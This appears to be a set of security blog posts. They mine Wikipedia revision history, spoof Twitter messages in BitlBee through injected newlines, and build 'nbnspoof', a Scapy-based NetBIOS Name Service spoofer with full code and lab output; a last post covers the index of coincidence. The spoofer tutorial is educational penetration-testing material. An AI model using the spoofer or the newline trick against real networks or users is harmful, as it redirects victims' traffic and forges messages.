Wikipedia articles carry with them a revision history that logs every change made to an article, as well as information on the user or IP address that made the change. The revision history and user information can provide someone gathering intelligence with as much or more information about a topic than its article. Many Wikipedia editors are personally connected to the articles they edit, or otherwise have a stake in what is being said, and by processing the revision data, it’s possible to gain some insight into those connections.

This is somewhat awkward and time-consuming to do through the web interface, so it helps to automate. I needed to determine which revisions and users introduced certain phrases in an article, and wrote the following script to help:

To use, first export the article(s) you want to process to XML using Wikipedia’s Special:Export page (be sure to uncheck “Include only the current revision”). Once you have the XML saved locally, usage is as follows:

./ <xml file> <word or phrase>

The output is comma-delimited and contains the Wikipedia timestamp, user information (username/id or IP address), and a link to the revision that introduced (or re-introduced) the phrase.
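
For anyone who wants to roll their own, here is a minimal sketch of the approach: walk each page’s revisions in order and report the ones where the phrase is present but was absent from the revision before. It is written for Python 3 with only the standard library, and it is not the script referenced above. The helper names (local, child, find_introductions) and the SAMPLE export are made up for illustration, and the sketch assumes the export lists revisions oldest-first. It prints the revision id rather than building a link.

```python
import xml.etree.ElementTree as ET

def local(tag):
    """Strip the '{namespace}' prefix ElementTree puts on tag names."""
    return tag.rsplit('}', 1)[-1]

def child(elem, name):
    """Return the first direct child with the given local name, or None."""
    for c in elem:
        if local(c.tag) == name:
            return c
    return None

def find_introductions(xml_text, phrase):
    """Yield (timestamp, user, revision_id) for each revision where the
    phrase is present but was absent from the previous revision."""
    root = ET.fromstring(xml_text)
    for page in root.iter():
        if local(page.tag) != 'page':
            continue
        present_before = False
        for rev in page:
            if local(rev.tag) != 'revision':
                continue
            text_el = child(rev, 'text')
            text = (text_el.text or '') if text_el is not None else ''
            present_now = phrase in text
            if present_now and not present_before:
                user = ''
                contributor = child(rev, 'contributor')
                if contributor is not None:
                    who = child(contributor, 'username')
                    if who is None:
                        who = child(contributor, 'ip')
                    user = who.text if who is not None else ''
                yield (child(rev, 'timestamp').text, user, child(rev, 'id').text)
            present_before = present_now

# Hypothetical, heavily trimmed export used only to exercise the function.
SAMPLE = """<mediawiki xmlns="http://www.mediawiki.org/xml/export-0.10/">
<page><title>Example</title>
<revision><id>1</id><timestamp>2007-01-01T00:00:00Z</timestamp>
<contributor><username>Alice</username><id>10</id></contributor>
<text>Hello world</text></revision>
<revision><id>2</id><timestamp>2007-01-02T00:00:00Z</timestamp>
<contributor><ip>192.0.2.7</ip></contributor>
<text>Hello weasel world</text></revision>
<revision><id>3</id><timestamp>2007-01-03T00:00:00Z</timestamp>
<contributor><username>Alice</username><id>10</id></contributor>
<text>Hello world</text></revision>
<revision><id>4</id><timestamp>2007-01-04T00:00:00Z</timestamp>
<contributor><username>Bob</username><id>11</id></contributor>
<text>weasel again</text></revision>
</page></mediawiki>"""

for row in find_introductions(SAMPLE, "weasel"):
    print(",".join(row))
```

In the sample, the phrase is introduced in revision 2, removed in revision 3, and re-introduced in revision 4, so revisions 2 and 4 are the ones reported.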

Hope this is of use to someone besides myself!


(so long as your target is using BitlBee ;) )

A few friends and I have been playing around with Twitter. I started using it to have a fun little place on my sidebar where I can paste stupid IRC quotes, fun links, and snarky comments about things. I wrote a bit of code so I could post to the Twitter thing on my sidebar from standard input on the command line (requires py-twitter):

import twitter
import sys

# Add your username and password here
user = "username"
pw = "password"

api = twitter.Api(username = user, password = pw)

# Post whatever arrives on standard input as a status update
api.PostUpdate(sys.stdin.read())


When I tested this out, I inserted a newline (“\n”) into the input, in order to see if my sidebar would render it (it doesn’t). I didn’t think much more of this, until a friend on IRC pointed out that it did render the newline in the title area of the post in the Liferea RSS reader. This inspired me to see if Liferea would render a lot of newlines (it does), so I whipped up a quick message, posted it, and another friend on IRC pointed out how it affected his twitter-follower of choice, BitlBee:

20:47 <@cs_weasel> jgk: now that I think about it, I wonder *how* many newlines liferea will render in a title
20:51 < alindeman> (02:49:26) McGrewSecurity: l
20:51 < alindeman> (02:49:26) o
20:51 < alindeman> (02:49:26) '
20:51 < alindeman> (02:49:26) s
20:51 < alindeman> (02:49:26)
20:51 < alindeman> (02:49:26) o
20:51 < alindeman> (02:49:26) f
20:52 < alindeman> (02:49:26)
20:52 < alindeman> (02:49:26) n
20:52 < alindeman> (02:49:26) e
20:52 < alindeman> (02:49:26) w
20:52 < alindeman> (02:49:26) l
20:52 < alindeman> (02:49:26) i
20:52 < alindeman> (02:49:26) n
20:52 < alindeman> (02:49:26) e
20:52 < alindeman> (02:49:26) s
20:53 <@cs_weasel> lol
20:53 <@cs_weasel> i misspelled "lot's"
20:54 <@cs_weasel> alindeman's turns out to take some collatoral damage
20:54 < alindeman> You mean you misspelled "lots" ? ;-)
20:55 <@cs_weasel> yeah

My friend here uses BitlBee as his IM client, and has twitter updates sent to him on it via the Jabber/Google Talk interface. I thought for a moment… my friend subscribes to (and maintains automatically with some scripting) a twitter called “msstate” that aggregates all the news and such about the university…

20:55 <@cs_weasel> oh wait watch this
20:55 < alindeman> 140 new lines?
20:55 < alindeman> I bet there is some DoS potential
20:55 <@cs_weasel> no
20:56 < alindeman> OHHH NICE
20:56 < alindeman> DAMN, good call
20:56 <@cs_weasel> paste!
20:56 < alindeman> (02:55:49) McGrewSecurity: Another boring day
20:56 < alindeman> (02:55:49) msstate: MAROON ALERT world is ending MAROON ALERT
20:56 <@cs_weasel> :-D

This was done by sending “Another boring day\nmsstate: MAROON ALERT world is ending MAROON ALERT”.

This won’t work with most IM clients. It works with BitlBee since it uses IRC and breaks up newline’d text by making it a separate message. Still a lot of fun ;)
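
To make the mechanism concrete, here is a toy model of what a gateway to a line-oriented protocol ends up doing. This is not BitlBee’s code; relay_as_irc_lines is a made-up name, and the only assumption is that the sender prefix is added once and the text is then split on newlines.

```python
def relay_as_irc_lines(sender, text):
    """Prefix the message with its sender, then split it on newlines.

    A line-oriented protocol like IRC cannot carry a newline inside one
    message, so every embedded newline starts a fresh line that no longer
    carries the real sender's prefix.
    """
    return (sender + ": " + text).split("\n")

status = "Another boring day\nmsstate: MAROON ALERT world is ending MAROON ALERT"
for line in relay_as_irc_lines("McGrewSecurity", status):
    print(line)
# McGrewSecurity: Another boring day
# msstate: MAROON ALERT world is ending MAROON ALERT
```

The second line looks like it came from “msstate” only because the attacker typed that prefix into the status text.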

So, if you’re into whatever’s on my mind, mixed in with occasionally weird freakout messages like the above, check out the Twitter sidebar I have now on this site, follow me from it, and add a feed of it to the software of your choice (if you’re brave ;) ).


This is the third and final post of a short series that demonstrates the creation of a simple security/penetration-testing application. The end result is a simple NetBIOS Name Service spoofer, written in Python.

If you’re enjoying the packet analysis aspects of this, you might be interested in the SANS IP Packet Analysis course I’ll be teaching soon.

In the previous post, we built a basic framework for the application and got nbnspoof to the point where it could sniff NetBIOS Name Service (NBNS) queries and responses. Today, I’m going to cover the additional steps we can take to make nbnspoof actually recognize when it should spoof a response, and craft the necessary packet to make the victim associate a given name with an IP address of our choice. This should conclude this series for the most part (although I may revisit it later if something interesting comes up).

If you want to follow along with the code, or just want to go ahead and start using nbnspoof (it’s in pretty good shape right now), here’s the current code:

First, let’s discuss some of the changes that were made to the last entry’s code. Most notable is the fact that we’ve changed some of the variables to be global:

global verbose
global regexp
global ip
global interface
global mac_addr

The reason for this change is that our get_packet() function will need to use this information, but the sniff() function does not pass the above data to get_packet() as an argument. The easiest solution was to simply make these user-specified options global. You’ll notice the addition of the “mac_addr” variable. This specifies the source MAC address that the spoofed responses should carry. There is also a command-line option added for this, and the usage() text reflects this:

-m The source MAC address for spoofed responses

I have decided to make this a required option, rather than defaulting to the actual MAC address of the interface. I believe that if one wants to use the actual MAC address, that should be a conscious decision. Typically, you would want this to reflect the address of the host on the local network that you are directing the victim to with your spoofing (if it is on the local network) or perhaps the gateway (if it’s outside the local network).

You’ll remember from the previous post that Scapy was dissecting NBNS responses as queries with some raw data stuck on the end. Because of this, we’ll be doing the packing and unpacking of IP addresses for responses ourselves. Here’s the code for that:

def pack_ip(addr):
   temp = IP(src=addr)
   return str(temp)[0x0c:0x10]

def unpack_ip(bin):
   temp = IP()
   temp = str(temp)[:0x0c] + bin + str(temp)[0x10:]
   temp = IP(temp)
   return temp.src

You’ll notice that these two functions leverage Scapy’s ability to pack and unpack IP addresses by crafting an IP packet in memory and setting or reading its source address. This wouldn’t have been hard to do ourselves (it’s just four bytes, each representing a number in the dotted-quad format), but it seems cleaner to let Scapy do it for us, even if it is a bit of a hack. It’s nice how Scapy can go back and forth between using attributes of packets and binary string representations so easily. One benefit of this is that if, for whatever reason, one wanted to supply a domain name instead of an IP address for the -h option, Scapy would do the lookup and conversion to IP address for us.
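
For comparison, here is roughly what “doing it ourselves” could look like with the standard library’s socket module instead of Scapy. The function names are made up for this sketch, and unlike the Scapy trick, inet_aton() only accepts dotted-quad strings and will not do a name lookup. The sample address is the one encoded in the last four bytes of the sniffed response’s raw payload.

```python
import socket

def pack_ip_stdlib(addr):
    """Dotted-quad string -> 4 raw bytes in network order."""
    return socket.inet_aton(addr)

def unpack_ip_stdlib(raw):
    """4 raw bytes in network order -> dotted-quad string."""
    return socket.inet_ntoa(raw)

packed = pack_ip_stdlib("172.16.185.132")
print(repr(packed))              # b'\xac\x10\xb9\x84' on Python 3
print(unpack_ip_stdlib(packed))  # 172.16.185.132
```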

Another issue we glossed over yesterday was how we were going to match queries with the regular expression the user provides. We compile the regular expression in main() so we don’t have to do it for each query:

 regexp = re.compile(name_regexp,re.IGNORECASE)

Note that, since NetBIOS names are always going to be uppercase, we have specified the IGNORECASE option, so that the user-supplied regular expressions are case-insensitive. In our get_packet() function, we kick off the code block to craft fake NBNS responses with this test:

   if query and regexp.match(pkt.QUESTION_NAME.rstrip()):

The .rstrip() function of strings in Python removes the trailing whitespace (remember that the names in NBNS packets are padded out to 15 characters). So, if the current packet is a query, and matches the regexp the user provided, we can move on to crafting and sending a response:
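
Here is a small standalone sketch of that test, using the padded names as they show up in the verbose output. The should_spoof helper is just a name I made up for the example, and the pattern is the “contains a period” expression used in the test run further down.

```python
import re

# Compile once, case-insensitively, as in main()
regexp = re.compile(r".*\..*", re.IGNORECASE)

def should_spoof(padded_name):
    """Strip the space padding, then test the name against the pattern."""
    return regexp.match(padded_name.rstrip()) is not None

print(should_spoof("HELLO.WOR      "))  # True: the name contains a period
print(should_spoof("XPPROTEST2     "))  # False: no period, so we leave it alone

# IGNORECASE lets a lowercase pattern match the uppercase names on the wire
print(bool(re.compile("hello", re.IGNORECASE).match("HELLO.WOR")))  # True
```

Keep in mind that match() anchors at the start of the name, so a pattern meant to hit something in the middle needs a leading “.*”.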

      response  = Ether(dst=pkt.src,src=mac_addr)
      response /= IP(dst=pkt.getlayer(IP).src,src=ip)
      response /= UDP(sport=137,dport=137)

One neat thing about Scapy is that it overloads the division operator (‘/’) for packets to make it a sort of concatenation/layering operator. Here we craft our response packet by giving it an Ethernet header, then tacking IP and UDP headers onto the end of it. The destination MAC and IP addresses are set to the source of the sniffed packet, and the source MAC and IP are set to the information supplied by the user. Next, we get into the creation of the NBNS section of the packet, starting with the information that Scapy can deal with:

response /= NBNSQueryRequest(NAME_TRN_ID=pkt.getlayer(NBNSQueryRequest).NAME_TRN_ID,\

This monster function call adds in a “NBNSQueryRequest” layer, and the arguments specify all the information needed to make this into a response. Where we set options to literal values, we use the values from the response packet we sniffed in the first part of this series. The other options are copied from the corresponding fields of the sniffed request, such as the transaction ID and name. An NBNS response requires more data than just this, and Scapy won’t handle the rest for us, so we’ll add it to the packet as a “Raw” payload and pack it in ourselves:

response /= Raw()
# Time to live: 3 days, 11 hours, 20 minutes
response.getlayer(Raw).load += '\x00\x04\x93\xe0'
# Data length: 6
response.getlayer(Raw).load += '\x00\x06'
# Flags: (B-node, unique)
response.getlayer(Raw).load += '\x00\x00'
# The IP we're giving them:
response.getlayer(Raw).load += pack_ip(ip)

I’ve separated this part out by field, and commented them based on how they’re named in Wireshark’s dissection, so that it’s not just one incomprehensible string of data. Something you want to pay attention to is that “Time to Live” field. I’m not sure how long Windows will really let you cache one of these responses, but this would be something to modify if you’re into playing around with this script. The time that’s hard-coded seems to be what Windows XP likes to hand out with its responses, though.
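
If you do want to play with the TTL, it may be easier to build these trailing fields with the struct module than to edit hex strings by hand. This is a sketch rather than what nbnspoof does; build_answer and its parameters are names I made up, and the defaults simply reproduce the hard-coded bytes (300000 seconds is 3 days, 11 hours, 20 minutes).

```python
import socket
import struct

def build_answer(ip, ttl=300000, flags=0x0000):
    """Return the trailing fields of an NBNS response as raw bytes:
    32-bit TTL, 16-bit data length, 16-bit flags, 4-byte address."""
    rdata = struct.pack(">H", flags) + socket.inet_aton(ip)
    return struct.pack(">IH", ttl, len(rdata)) + rdata

payload = build_answer("172.16.185.132")
print(repr(payload))
# b'\x00\x04\x93\xe0\x00\x06\x00\x00\xac\x10\xb9\x84' on Python 3
```

With the defaults this comes out byte-for-byte the same as the Raw load Scapy showed for the real response in the previous post.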

Finally, after packing in the last field, which is the IP address we’re making the name resolve to, we send the packet on its way:

      sendp(response,iface=interface,verbose=0)
      if verbose:
         print 'Sent spoofed reply to #' + str(response.getlayer(NBNSQueryRequest).NAME_TRN_ID)

We specify the interface, and tell sendp to silence its visual confirmation of packet sending. If the user wanted verbose output, we print out a message saying that we spoofed a reply to the request with a specific transaction ID. The response we sent will also be picked up by sniff(), so in verbose mode it will be displayed with a dissection too.

That’s it! It works! Let’s see how it looks when we run it:

$ sudo ./ -v -i vmnet8 -n ".*\..*" -h -m 00:0c:29:27:be:ef
32949: Q SRC: DST: NAME:"HELLO.WOR      "
Sent spoofed reply to #32949
32949: R SRC: DST: NAME:"HELLO.WOR      " IP:
32950: Q SRC: DST: NAME:"XPPROTEST2     "
32950: R SRC: DST: NAME:"XPPROTEST2     " IP:

In this test run, on the VMware network between the host Linux machine and the two Windows VMs (.132 and .133), I ran nbnspoof in verbose mode, set with a regular expression to only spoof responses for names that contain a period (‘.’). This is a quick-hack way of catching mistyped domain names and such, while letting most legitimate requests for local network systems go. I specified the Linux host for the IP address, and a silly MAC address with a VMware vendor prefix. From “xpprotest”, I first pinged “hello.wor”, which nbnspoof matched and spoofed for me, and then I pinged “xpprotest2”, which is (correctly) ignored.

So that settles it. We now have a nice tool for demonstrating how Windows name resolution can be spoofed in certain situations. More importantly, I hope some people have learned a bit about Scapy and the sort of procedure one might follow in developing a simple penetration testing application like this. Hopefully, this will be something you can apply to many situations :) .


This is the second post of a short series of entries that demonstrate the creation of a simple security/penetration-testing application. The end-result will be a simple NetBIOS Name Service spoofer, written in Python.

If you’re enjoying the packet analysis aspects of this, you might be interested in the SANS IP Packet Analysis course I’ll be teaching soon.

In the previous part of this series, we took a look at the NetBIOS Name Service (NBNS) query and response packets in order to get an idea of what we would need to do to craft our spoofed responses. Today, we’re actually going to start writing some code, with the goal being to get a basic skeleton of our spoofer up and running. At the end of this part, we’ll have nbnspoof at the point where it will sniff for, dissect, and display NBNS queries and responses.

If you’re following along at home, the only requirements for the code are a working installation of Python and the excellent packet manipulation library Scapy. Scapy may be in your operating system’s repositories (it is for Ubuntu at least). If it’s not, it shouldn’t be too difficult to install by hand, following the instructions on the Scapy homepage. The code we’re looking at today is available at:

One thing that we want to do before we start coding is to see how Scapy decodes these NBNS packets. Scapy has an interactive mode that gives you access to a Python interpreter and all of the Scapy functionality, so we can use it to look at one of our packet dumps from yesterday:

weasel@hacktop:~/Desktop/nbnspoof$ scapy
Welcome to Scapy (
>>> pkts = rdpcap("ping_with_nbns_response.pcap")
>>> pkts
<ping_with_nbns_response.pcap: ICMP:8 UDP:6 TCP:0 Other:4>
0000 Ether / ARP who has says
0001 Ether / ARP is at 00:50:56:e8:0b:97 says
0002 Ether / IP / UDP / DNS Qry "xpprotest2.localdomain."
0003 Ether / IP / UDP / DNS Ans
0004 Ether / IP / UDP / DNS Qry "xpprotest2.localdomain."
0005 Ether / IP / UDP / DNS Ans
0006 Ether / IP / UDP > / NBNSQueryRequest
0007 Ether / ARP who has says
0008 Ether / ARP is at 00:0c:29:27:b9:f0 says
0009 Ether / IP / UDP > / NBNSQueryRequest / Raw
0010 Ether / IP / ICMP > echo-request 0 / Raw
0011 Ether / IP / ICMP > echo-reply 0 / Raw
0012 Ether / IP / ICMP > echo-request 0 / Raw
0013 Ether / IP / ICMP > echo-reply 0 / Raw
0014 Ether / IP / ICMP > echo-request 0 / Raw
0015 Ether / IP / ICMP > echo-reply 0 / Raw
0016 Ether / IP / ICMP > echo-request 0 / Raw
0017 Ether / IP / ICMP > echo-reply 0 / Raw

In the above session, I started Scapy, loaded a list of packets from a pcap dump, showed a summary of the number of packets of each type, and then listed a summary of each packet in the dump. From the looks of the output, it seems that packet 6 is the NBNS query, and packet 9 is the response. Let’s take a close look at those:

>>> pkts[6]
<Ether  dst=ff:ff:ff:ff:ff:ff src=00:0c:29:27:b9:f0 type=IPv4 |
<IP  version=4L ihl=5L tos=0x0 len=78 id=64 flags=
frag=0L ttl=128 proto=UDP chksum=0x6eb9 src=
dst= options='' |<UDP  sport=netbios-ns
dport=netbios-ns len=58 chksum=0x5224 |<NBNSQueryRequest
>>> pkts[9]
<Ether  dst=00:0c:29:27:b9:f0 src=00:0c:29:03:ad:f7 type=IPv4 |
<IP  version=4L ihl=5L tos=0x0 len=90 id=35 flags= frag=0L
ttl=128 proto=UDP chksum=0x6f45 src=
dst= options='' |<UDP  sport=netbios-ns
dport=netbios-ns len=70 chksum=0xd516 |<NBNSQueryRequest
<Raw  load='\x00\x04\x93\xe0\x00\x06\x00\x00\xac\x10\xb9\x84' |>>>>>

From the above, Scapy appears to recognize and dissect the packets (which are the same packets we looked at in Part 1 in Wireshark) fairly well. It looks like we’ll have to mask out bits in the “FLAGS” field ourselves, but that’s not a big deal. Also, you’ll notice that the response is basically the same thing as a query, with the actual “answer”, including the IP address, tacked on at the end in the “Raw load” layer. This means that when we build our responses up in our code, we’ll have to handle all the fields in this section ourselves, which won’t be hard. We can use Wireshark as a reference to see how it is dissected/crafted.

One nice thing we can observe from what Scapy has done with these packets is that it has the ability to decode and encode the names from that crazy encoding scheme we saw in the previous post. That’ll save us some headaches and effort. This encoding is called “First Level Encoding”, and was created in some sort of attempt at getting NetBIOS to play nice with DNS. It involves taking each byte of the name, splitting apart the upper and lower 4 bits, and adding each 4 bits to the letter ‘A’ in hex. It’s not too complex, but it’s nice that we won’t have to deal with it in our code :) .
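
Just to show there’s no magic in it, here is a sketch of the encoding in Python 3. The function names are mine, and I’m assuming the usual NetBIOS layout of a 15-character space-padded name followed by a one-byte suffix. Scapy does all of this for us, so none of it ends up in nbnspoof.

```python
def first_level_encode(name, suffix=0x00):
    """Encode a NetBIOS name as 32 letters in the range 'A'..'P'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    out = []
    for b in raw:
        out.append(chr(ord("A") + (b >> 4)))    # upper 4 bits
        out.append(chr(ord("A") + (b & 0x0F)))  # lower 4 bits
    return "".join(out)

def first_level_decode(encoded):
    """Reverse the encoding; returns (15-character name, suffix byte)."""
    pairs = zip(encoded[0::2], encoded[1::2])
    raw = bytes(((ord(h) - ord("A")) << 4) | (ord(l) - ord("A")) for h, l in pairs)
    return raw[:15].decode("ascii"), raw[15]

encoded = first_level_encode("xpprotest2")
print(len(encoded))                 # 32
print(first_level_decode(encoded))  # ('XPPROTEST2     ', 0)
```

A space (0x20) always becomes “CA”, which is why padded names on the wire end in long runs of “CACACA…”.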

Speaking of code, we’re at a place where we can start writing some. For larger projects you’ll want some sort of requirements and/or design documents to help guide your process, but this is going to be a very simple program. Even in its simplicity, however, you want some sort of guideline for how you want your program to operate. In this case, I want the ability to tie nbnspoof to an interface, have it listen for any NBNS queries for names matching a regular expression, and craft responses to these queries that point them to a given IP address.

Given this information, I want to write the “usage” text for the program first, so I have some reminder of how it should behave. This will be what is displayed if someone runs nbnspoof with zero or invalid arguments. This may change in the development of the program, but here’s what we’re starting with:

def usage():
   print """Usage: [-v] -i <interface> -n <regexp> -h <ip address>

-v Verbose output of sniffed NBNS name queries, and responses sent

-i The interface you want to sniff and send on

-n A regular expression applied to each query to determine whether a
   spoofed response will be sent

-h The IP address that will be sent in spoofed responses
"""

(I’ll be skipping around in the code, so if you’re hardcore into this or have questions, you may want to follow along in the source code itself to see what I’m skipping)

So we have three required arguments (they’re in angle brackets): an interface to listen and inject on, a regular expression for names to match, and an IP address to send in the responses. There is a single optional argument, in square brackets, that specifies whether or not we want “verbose” output. The verbose output will include a summary of NBNS queries and responses as they are sniffed, as well as notification of what packets it has crafted and sent off.

To parse these arguments taken in from the command line, we use Python’s “getopt” module in the following code:

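def main():
   global verbose
   try:
      opts, args = getopt.getopt(sys.argv[1:],"vi:n:h:")
   except getopt.GetoptError:
      # Unknown option, or an option missing its argument
      usage()
      sys.exit(1)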

   verbose = False
   interface = None
   name_regexp = None
   ip = None

   for o, a in opts:
      if o == '-v':
         verbose = True
      if o == '-i':
         interface = a
      if o == '-n':
         name_regexp = a
      if o == '-h':
         ip = a

   if args or not ip  or not name_regexp or not interface:
      # A required option is missing, or stray arguments were left over
      usage()
      sys.exit(1)

It’s fairly simple. The list of arguments passed from the shell is given to getopt, with a format string to tell it what options to look for, and which ones take arguments (designated by a colon after the letter). If this throws an exception (because the user supplied an unknown option, or left off an option’s argument), the usage text is displayed and the program exits.

After declaring our variables with default values, we go into an interesting loop. “opts” holds an array of tuples, each one containing an option and its argument. For each, we test to see if it’s one we know and care about, and set up our variables with that option’s argument. After we’re finished doing that, we check to see if any of our required options were not given, and whether or not we have any extra arguments left over. If anything seems fishy, we remind the user of the usage() and exit.
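
If you want to poke at getopt without touching the network, here is the same logic pulled out into a function that takes the argument list directly. This is a Python 3 sketch; parse_args and the dictionary it returns are my own invention for the example, and it returns None in the cases where nbnspoof would show the usage text.

```python
import getopt

def parse_args(argv):
    """Return a dict of settings, or None if the arguments are unusable."""
    try:
        opts, args = getopt.getopt(argv, "vi:n:h:")
    except getopt.GetoptError:
        return None  # unknown option, or an option missing its argument

    settings = {"verbose": False, "interface": None,
                "name_regexp": None, "ip": None}
    for o, a in opts:
        if o == "-v":
            settings["verbose"] = True
        elif o == "-i":
            settings["interface"] = a
        elif o == "-n":
            settings["name_regexp"] = a
        elif o == "-h":
            settings["ip"] = a

    # Leftover arguments or a missing required option both count as misuse
    if args or not settings["ip"] or not settings["name_regexp"] \
            or not settings["interface"]:
        return None
    return settings

print(parse_args(["-v", "-i", "vmnet8", "-n", ".*", "-h", "192.0.2.1"]))
print(parse_args([]))      # None: nothing required was supplied
print(parse_args(["-x"]))  # None: getopt raised GetoptError
```

Note that an empty argument list does not raise an exception in getopt; it is the required-option check at the end that catches it.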

All of this required a bit of effort, and makes up what will be a good chunk of our code, but it helps the program look professional. A penetration tester of any skill should be able to pick it up and figure out how to use this in a fairly short amount of time.

With the preliminaries and preparation out of the way, we can get down to some serious network business! You really won’t believe how easy it is to set up a sniffer using the Scapy library. Here we go:

   sniff(iface=interface,filter="udp and port 137",store=0,prn=get_packet)

Wow, huh? It’s pretty self-explanatory, but here we go: First, we tell it what interface to sniff and inject on, based on what the user told us (eth0, eth1, etc). Next, we have a BPF filter that tells the libpcap library to only send us UDP packets that involve port 137. This is for the sake of performance, and to prevent cases where Scapy might accidentally identify something on another port as being NBNS traffic (perhaps someone trying to detect a user of nbnspoof would craft NBNS packets on another port to see if the nbnspoof user would respond when a Windows machine wouldn’t). The “store” argument is set to zero, because once we’ve dealt with each packet, we’re going to throw it away. Otherwise, the sniff function will store and return a list of packets, which would waste memory, as we won’t be using it.

Finally, the “prn” argument is set to get_packet. “prn” allows you to set a “call-back” function. What this means is that for every packet that sniff() sees, it will pass that packet to the call-back function. Here, we have set it to get_packet, which is our function for dissecting, displaying, and crafting packets based off the NBNS queries we see. This function is where most of the real work of nbnspoof will be done. Let’s take a look at how it is working so far:

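def get_packet(pkt):
   # Ignore anything Scapy does not dissect as NBNS
   if not pkt.getlayer(NBNSQueryRequest):
      return

   # The top bit of FLAGS is set on responses and clear on queries
   if pkt.FLAGS & 0x8000:
      query = False
      ip = ''
   else:
      query = True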

First off, we see if the packet has the “NBNSQueryRequest” layer, as far as Scapy is concerned. This will help us weed out anything that might show up on this port that isn’t NBNS related. Remember that Scapy sees NBNS response packets the same way, so both queries and responses will pass this test.

Next, we test the FLAGS section of the NBNS data to see if this packet is a query or a response. We do this by testing whether the flags, bitwise AND’d with 0x8000 (binary: 1000000000000000), come out non-zero. If the bit is set, then it is a response. Now, for the sake of the “verbose” option, we would want to decode from the packet what IP address this response carries. Right now, we don’t have this code in place, so we’re just putting in '' (an empty string) as a placeholder. If the bit isn’t set, then it’s a query.
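
If bit masking is new to you, here is the test on its own in a few lines of Python 3. The two sample FLAGS values are illustrative ones I picked for the example, not values read out of the capture, and is_response is a made-up helper name.

```python
RESPONSE_BIT = 0x8000  # top bit of the 16-bit FLAGS field

def is_response(flags):
    """True when the response bit is set, False for a query."""
    return bool(flags & RESPONSE_BIT)

print(format(RESPONSE_BIT, "016b"))  # 1000000000000000
print(is_response(0x0110))           # False: top bit clear, so a query
print(is_response(0x8500))           # True: top bit set, so a response
```

The AND throws away every bit except the one we care about, so whatever else is set in FLAGS doesn’t affect the answer.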

   if verbose:
      print str(pkt.NAME_TRN_ID) + ":",
      if query:
         print "Q",
      else:
         print "R",
      print "SRC:" + pkt.getlayer(IP).src + " DST:" + pkt.getlayer(IP).dst,
      if query:
         print 'NAME:"' + pkt.QUESTION_NAME + '"'
      else:
         print 'NAME:"' + pkt.QUESTION_NAME + '"',
         print 'IP:' + ip

If we have the “verbose” option set, we want to display a summary of the current packet. This includes the transaction ID that uniquely pairs a question and response, the status of it being a query or response, source and destination IPs, and what name is being looked up. Now that we’ve covered what we have of the code so far, let’s use it to watch NBNS traffic between two Windows VMs:

weasel@hacktop:~/Desktop/nbnspoof$ sudo ./ -v -i vmnet8 -n unused -h unused
32878: Q SRC: DST: NAME:"XPPROTEST2     "
32878: R SRC: DST: NAME:"XPPROTEST2     " IP:

You’ll notice that even though we’re not doing anything with the regexp or IP address, we still need to specify them to get past our own checks :) . The above output is from pinging from “xpprotest” to “xpprotest2”, and then attempting to ping “example.cpm”. Some things to note:

  • Transaction IDs for NBNS seem to be sequential! Stick that in your pocket for the next time you’re doing passive profiling/fingerprinting. Maybe I should try sniffing a machine as it boots up to see if it always starts at the same number.
  • The name is always going to be 15 characters, all caps, padded out with spaces. This has to do with the encoding of the name in these NBNS packets, rather than a limitation of our script or Scapy. If a host tries to resolve a non-existent name that’s longer than this, it doesn’t try NBNS, so this’ll limit what names we can spoof for.

I hope you enjoyed this! The next part will take us through matching names we want to spoof for, dissecting and crafting response packets, and sending them to the machines that broadcast the queries.


Have you ever worked an exercise for a class, or studied a topic, only to pick up one little trick or technique that made the entire activity worth it? In one way, I guess it could be considered as missing the point, but any time you wind up taking something useful away from an activity, I think it’s worth it.

Index of Coincidence is one of those things for me. In a cryptography class, we were tasked with cracking a message encrypted in a Vigenere cipher. A Vigenere cipher is implemented as a series of Caesar ciphers. A Caesar cipher is your typical grade-school shifting of letters (A becomes C, B becomes D, etc.). With Vigenere, rather than having one shift (2 in the previous sentence’s example), we have a series of shifts that we cycle through. The first step of breaking a Vigenere cipher is to figure out how many shifts have been implemented. A property of text known as “index of coincidence” is used to determine this.
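
If you’ve never played with one, here is a tiny Vigenere sketch in Python 3, with the key given directly as a list of shifts. The function name is mine, and this is only meant to illustrate the “cycle of Caesar shifts” idea; it isn’t code from the class exercise.

```python
def vigenere_encrypt(plaintext, shifts):
    """Shift each letter by the next value in `shifts`, cycling through them.
    Non-letters pass through untouched and do not consume a shift."""
    out = []
    used = 0
    for ch in plaintext.upper():
        if "A" <= ch <= "Z":
            shift = shifts[used % len(shifts)]
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
            used += 1
        else:
            out.append(ch)
    return "".join(out)

# A single shift of 2 is just the Caesar cipher: A becomes C, B becomes D
print(vigenere_encrypt("AB", [2]))                           # CD
# Five shifts (the keyword LEMON as numbers) cycled over the message
print(vigenere_encrypt("ATTACKATDAWN", [11, 4, 12, 14, 13]))  # LXFOPVEFRNHR
```

The length of that shifts list is exactly the number the index of coincidence helps you recover.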

And it’s so useful for other things! The idea is, take your data, be it alphabetic characters, bytes, whatever, and shift it by a certain amount (wrapping back around from the tail to the head). Then, compare it with the original, count how many times the two match, and figure it up as a percentage of the entire set of data. For example:

Take your data be it alphabetic characters, bytes, whatever, and shift it
data be it alphabetic characters, bytes, whatever, and shift it Take your
 *  *      *                *                  * **         *
8/73 = 0.109589041

So in this example, the Index of Coincidence (IOC) is about 11 percent. Typically, English text has an IOC of about 6.69 percent, although this is over a larger chunk of text (smaller examples like this will be all over the map). Other languages have distinctive IOCs as well.

What’s really cool about this is that it’s a good “rule of thumb” measure of how random or uniform a set of data is. Random data should have very low IOC, while something completely uniform will tend to be closer to 1.0, or 100%. Why is this cool? Good encryption should result in ciphertext that is almost indistinguishable from random data. Good compression algorithms should also recognize patterns in data and result in very non-uniform data. So when we’re doing analysis of a piece of malware, for example, if we suspect that the sample is encrypted or compressed in some way, we can test that hypothesis.
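
Here is a quick Python 3 sanity check of those claims. The shift_ioc name is just for this sketch; it runs the same shift-and-compare calculation on the sentence from the worked example (shifted by the ten characters of “Take your ”), on a buffer of identical bytes, and on random bytes.

```python
import os

def shift_ioc(data, shift=1):
    """Fraction of positions where data matches itself rotated by `shift`."""
    n = len(data)
    matches = sum(1 for i in range(n) if data[i] == data[(i + shift) % n])
    return matches / n

sentence = "Take your data be it alphabetic characters, bytes, whatever, and shift it"
print(shift_ioc(sentence, 10))          # 8 matches out of 73, about 0.1096
print(shift_ioc(b"A" * 4096, 5))        # 1.0: completely uniform data
print(shift_ioc(os.urandom(65536), 5))  # varies per run, roughly 1/256
```

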